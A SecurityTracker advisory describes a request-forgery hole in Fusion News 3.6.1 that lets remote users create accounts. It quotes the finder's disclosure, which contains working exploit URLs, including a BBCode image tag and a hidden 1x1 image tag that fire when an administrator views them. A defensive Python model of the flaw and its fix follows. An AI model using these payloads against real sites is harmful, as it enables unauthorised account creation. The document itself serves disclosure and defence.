SecurityTracker.com
SecurityTracker Archives

Category: Application (Forum/Board/Portal) > Fusion News
Vendors: FusionPHP
Fusion News Lets Remote Users Add User Accounts on the Application
SecurityTracker Alert ID: 1010829
SecurityTracker URL: http://securitytracker.com/id/1010829
CVE Reference: GENERIC-MAP-NOMATCH
Date: Jul 31 2004
Impact: Modification of user information, User access via network
Exploit Included: Yes
Version(s): 3.6.1 and prior versions
Description: A vulnerability was reported in Fusion News. A remote user can add a user account.

r3d5pik3 reported that a remote user can create a specially crafted URL that, when loaded by a target administrator's browser, will cause a user account to be added to Fusion News. The signup action is triggered by a plain GET request whose only access check is the administrator's existing session, so any content that makes the browser fetch the URL suffices. The malicious URL can be placed in a BBCode image tag within a comment, for example, and is then fetched automatically when the target administrator views the comment.

A demonstration exploit URL is provided:

http://[target]/news/index.php?id=signup&username=r3d5pik3&email=r3d_5pik3@yahoo.com&password=password&icon=&le=3&timeoffs

Impact: A remote user can cause an administrator to create a new user account.
Solution: No solution was available at the time of this entry.
Vendor URL: www.fusionphp.net/index.php?cat=fnews&page=downloads
Cause: State error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


Source Message Contents

Subject: Fusion News Yet Another Unauthorized Account Addition Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product:  Fusion News
vendor: FusionPHP (fusionphp.net)
Affected Versions:  3.6.1 and lower
Description:  A widely used news management system
Vulnerabilities:  Unauthorized Account Addition Vulnerability
Date:  July 29, 2004
Vuln Finder: r3d5pik3 (me)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
1.) About
2.) Unauthorized Account Addition
3.) Vendor Notice
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ About ] oOoOoOo(O_o)

Ok this is basically all due to the vendor being really lazy and not SUFFICIENTLY patching the previous similar exploit. Basically all the vendor did to stop the last vulnerability was make it so you had to be signed on as an admin to create an account, and that is simply just not enough.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ Unauthorized Account Addition ] oOoOoOo(O_o)

Unlike the previous related vulnerability, this one you can't simply type something into the URL bar and press enter. All you have to do is make sure the admin is logged on, then do one of the following. (The first is probably the most reliable for an attacker.)

1.) Leave them a comment with an [img] BBCode set like this

[img]http://vulnrable.com/news/index.php?id=signup&username=r3d5pik3&email=r3d_5pik3@yahoo.com&password=password&icon=&le=3&timeoffset=1[/img]

2.) As long as the admin has RECENTLY logged on, you could exploit it remotely by convincing him to go to a site that has a malicious <img> tag such as the following

<img src="http://free.hostultra.com/~negativebliss/phpfusion/index.php?id=signup&username=teh-r3d-1&email=r3d_5pik3@yahoo.com&password=password&icon=&le=3&timeoffset=1" size="1" width="1">

That would make a 1x1 pixel image, meaning the admin wouldn't even know what happened.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ Vendor Notification ] oOoOoOo(O_o)

Give me 5 seconds to press the send button to the vendor ;)

-r3d5pik3
(o_O)oOoOoOo [ ph33r t3h r3d 1z !!! ] oOoOoOo(O_o)
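The request-forgery pattern behind both the SecurityTracker description and r3d5pik3's [img]/<img> vectors above, modelled as an added example. This is not Fusion News's own PHP code: the `Request` structure, `vulnerable_signup`, `hardened_signup`, `SITE_ORIGIN` and the sample requests are hypothetical reconstructions written for illustration. The vulnerable handler reproduces the behaviour the advisory describes (an admin session plus GET parameters creates an account); the hardened handler shows the three defences a fix for this class of bug needs: state changes only on POST, an Origin check, and a per-session synchronizer token that an image tag on another page cannot supply.

```python
"""Model of the Fusion News 3.6.1 signup CSRF and its mitigation (hypothetical, not project code)."""
import hmac
import secrets
from dataclasses import dataclass, field

SITE_ORIGIN = "https://news.example.test"   # constructed value for the news site's own origin


@dataclass
class Request:
    method: str
    query: dict      # parsed query string
    form: dict       # parsed POST body
    headers: dict
    session: dict    # server-side session looked up from the session cookie the browser sent


@dataclass
class UserStore:
    users: dict = field(default_factory=dict)

    def add(self, username: str, email: str) -> None:
        self.users[username] = email


def vulnerable_signup(req: Request, store: UserStore) -> str:
    """Pattern described in the advisory: an admin session plus GET parameters creates an account."""
    if req.query.get("id") != "signup":
        return "404"
    if not req.session.get("is_admin"):
        return "403 admin login required"
    # Nothing proves the admin intended this request; the parameters come straight from
    # whatever URL the browser was told to load (an [img] BBCode, a 1x1 <img> elsewhere).
    store.add(req.query["username"], req.query["email"])
    return "200 account created"


def issue_csrf_token(session: dict) -> str:
    """Synchronizer token: random, kept server-side, embedded only in the admin's own signup form."""
    token = secrets.token_hex(16)
    session["csrf_token"] = token
    return token


def hardened_signup(req: Request, store: UserStore) -> str:
    if req.query.get("id") != "signup":
        return "404"
    if not req.session.get("is_admin"):
        return "403 admin login required"
    # 1. State change only on POST: <img> and [img] can only make the browser issue GET.
    if req.method != "POST":
        return "405 use POST"
    # 2. Browsers send Origin on cross-site POSTs; a foreign origin is rejected outright.
    origin = req.headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return "403 cross-site request rejected"
    # 3. The token in the form must match the one stored in this session (constant-time compare).
    expected = req.session.get("csrf_token")
    supplied = req.form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return "403 missing or invalid CSRF token"
    store.add(req.form["username"], req.form["email"])
    return "200 account created"


# --- constructed requests modelling the advisory's scenario ---
def forged_img_request(session: dict) -> Request:
    """What the admin's browser sends when it renders the malicious [img] tag in a comment."""
    return Request(
        method="GET",
        query={"id": "signup", "username": "r3d5pik3", "email": "r3d_5pik3@yahoo.com", "password": "password"},
        form={},
        headers={"Referer": SITE_ORIGIN + "/news/comments"},
        session=session,
    )


def forged_cross_site_post(session: dict) -> Request:
    """A POST auto-submitted from a form on another site (attacker cannot know the session token)."""
    return Request(
        method="POST",
        query={"id": "signup"},
        form={"username": "r3d5pik3", "email": "r3d_5pik3@yahoo.com", "csrf_token": "guess"},
        headers={"Origin": "https://attacker.example.test"},
        session=session,
    )


def legitimate_admin_request(session: dict, token: str) -> Request:
    return Request(
        method="POST",
        query={"id": "signup"},
        form={"username": "newuser", "email": "newuser@example.test", "csrf_token": token},
        headers={"Origin": SITE_ORIGIN},
        session=session,
    )


def demo() -> dict:
    results = {}
    session, store = {"is_admin": True}, UserStore()
    results["vuln_forged"] = vulnerable_signup(forged_img_request(session), store)
    results["vuln_users"] = sorted(store.users)

    session, store = {"is_admin": True}, UserStore()
    results["hard_forged_get"] = hardened_signup(forged_img_request(session), store)
    token = issue_csrf_token(session)
    results["hard_forged_post"] = hardened_signup(forged_cross_site_post(session), store)
    results["hard_legit"] = hardened_signup(legitimate_admin_request(session, token), store)
    results["hard_users"] = sorted(store.users)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The session check the vendor added after the earlier report is kept in both handlers; the difference is that the hardened version also requires evidence the request was made from the admin's own page. In a real deployment the token would be rendered into the signup form and the handler bound to the POST route, and a `SameSite` cookie attribute would add a fourth layer, but the three checks above are what turn the advisory's one-line image tag into a rejected request.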


Copyright 2020, SecurityGlobal.net LLC